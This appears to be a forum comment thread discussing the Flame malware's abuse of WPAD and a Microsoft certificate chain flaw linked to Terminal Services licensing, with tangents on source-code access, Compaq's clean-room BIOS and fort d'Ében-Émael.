Flame took advantage of WPAD, a little-known magical hostname (http://en.wikipedia.org/wiki/Web_Proxy_Autodiscovery_Protoco...) to do MITM attacks on the Windows Update servers.
Flame then installed 'WuSetupV.exe' with the description "Desktop Gadget Platform" "Allows you to display gadgets on your desktop".
What's amazing is that Windows Update doesn't require explicit validation of an update-only certificate chain. It seems like any certificate from the Microsoft root can certify updates (!).
I wonder how big this hole is to fix. I also wonder, as many have, if this was written by an Intelligence agency and, if so, if they had access to Windows' source code.
Zombies in the compound indeed.
I hope Microsoft can deliver the revoked certificates in a trustworthy manner.
What could have however happened is that the said "Intelligence agency" first created a malware to infect MSFT engineers' computers and get access info of the code repository and then spoofing themselves as MSFT employees to download the source code. This is alot more plausible considering what stuxnet and flame can already do. (Assuming they were made by same "Intelligence agency")
MSFT should really check the systems of their employees first.
Microsoft licenses product source code to qualified customers, enterprises, governments, and partners for debugging and reference purposes
Drop 'em an email if you're curious.
Compaq couldn't just copy IBM's BIOS to make their new machine guaranteed IBM compatible, this would be illegal, and easily proven by IBM.
Solution: Reverse-engineer IBM's BIOS. Compaq used two sets of programmers - one group analyzed the original code and made notes of exactly how it responded.
The second group took these notes, and wrote their own BIOS that performed exactly the same.
Microsoft shared source initiative
In 2003 MS gave China access to their source
Quite a demonstration that even if you go to great pains to secure the code if you aren't careful with your credentials then it's for nothing.
I always remind myself I'm not as smart as I think I am.
Our main line of defense, the fort d'Ében-Émael, had been built by German workers. The German army had their plans, and knew the weak point of the fort: its vast, undefended roof (it was used as a football field by the soldiers).
During a dark night, they landed with gliders on the roof, and manually set up shaped charges to destroy the turrets, which were resistant to conventional bombs.
 http://en.wikipedia.org/wiki/Shaped_charge , damages seen from the outside: http://upload.wikimedia.org/wikipedia/commons/thumb/f/f6/Ebe...
Edited to reconcile my foggy memory with the historic truth...
The roof should have been mined, but the soldiers petitioned the hierarchy to keep their sports field...
You mean the bad news.
Is anyone else infuriated that a vulnerability like this exists in what is analogous to copy protection code?
In other words, if Microsoft had been spending more of their resources on making software work, instead of making software work only when you've proven you've paid for it, this particular issue would not exist.
I suppose I can break it down another way.
Complexity introduces vulnerabilities.
Some complexity is necessary for the software to accomplish what the customer wants.
Some complexity is arguably necessary to protect the interests of the vendor. This is arguable because it varies between open source and proprietary software.
To me, it is upsetting when the code to protect the vendor's interests is where a critical security vulnerability exists. I don't think this is a controversial statement.
Cryptographically signed binaries are not used to manage licensing issues, they are used to make sure that no-one intercepts your download and replaces it with a malicious binary. It is absolutely essential that computer programs are signed or delivered through a secure connection.
Losing your signing keys will make the entire system jeopardized and new keys must be generated and securely transmitted (this is hard).
> To me, it is upsetting when the code to protect the vendor's interests is where a critical security vulnerability exists.
Yes, that would be upsetting if it were true. But it isn't. The whole system is in place to protect you, the customer.
The entire reason the attackers could use the certificate was because Microsoft left behind that functionality in the suite of software that allows enterprise customers to license their instances of Terminal Servers.
I am not railing against cryptographic signing as a concept -- what happened was Microsoft played fast and loose with their certificate chain in order to provide their customers with a way to prove that they had paid for software.
The certificate chain could have been a lot cleaner if that licensing bit wasn't necessary.
The chances of someone slipping in a backdoor in kernel releases are very slim.
But you can always get the source and build the package yourself. Can you do that with Windows?
The downside of trusting certificates is that you're abstracting trust to a point that you (where you == the IT industry) stops questioning who can do what. You trust something absolutely, but that trust is based on lots of people whom you don't know doing the right thing without making mistakes.
In fact, there is no company or software community anywhere that writes highly complex and bug free software. It's not possible.
> In fact, there is no company or software community anywhere that writes highly complex and bug free software. It's not possible.
I agree with this point. For this reason, the point I'm trying to make is that reducing complexity is a key way to make software more secure. And when reducing complexity, we should look at what is in the user's best interest.
Code has bugs--that is an unescapable fact for the foreseeable future. Therefore, any code running on your computer makes you slightly less safe. Therefore, any code on your machine which is not accomplishing something in your best interests could be considered an unnecessary security risk.
I am arguing that it is not in your best interest to insure that you bought a little certificate from Microsoft before your computer operates the way you have configured it to.
After all that, of course it is in your best interests to have Microsoft grow its war chest and be a healthy company that can employ tens of thousands of smart developers to write good code (which we choose to keep using year after year).
But, every time a product breaks because they have to make sure I'm not a criminal, and the way they do it is sloppy, I get upset, and I think it's rightfully so. Usually it is small, proprietary CMS or CRM software that drives me crazy. But today it's this issue.
The "bug" here was in key management, not in SW that's running in my computer.
The code that caused the certificate chain to be compromised is related to licensing Terminal Services on Windows Server. That is how their key management failed, and that is what I'm railing against--The fact that this ability to sign binaries with a legitimate Microsoft certificate has been hidden away in copies of Windows Server for years by mistake. And not for any direct customer benefit, but to employ a licensing scheme.
I'm on the fence about this issue, honestly. Part of me feels like they believe passionately that we're stepping into new, dangerous territory. The other part of me indeed feels like this is great advertising for not only them, but their industry (And they're going to push it all they can).
But the fact of the matter is they admit they can't protect you, whoever you are, from these types of targeted attacks. I've seen well respected speakers from Defcon go back and forth with Mikko on Twitter about the efficiency of AV.
It sucks you're (the parent) being downvoted but this is an issue, what with the incredible amount of FUD that comes with every serious attack.
EDIT: My mistake in misspelling Mikko's name. Sorry about that.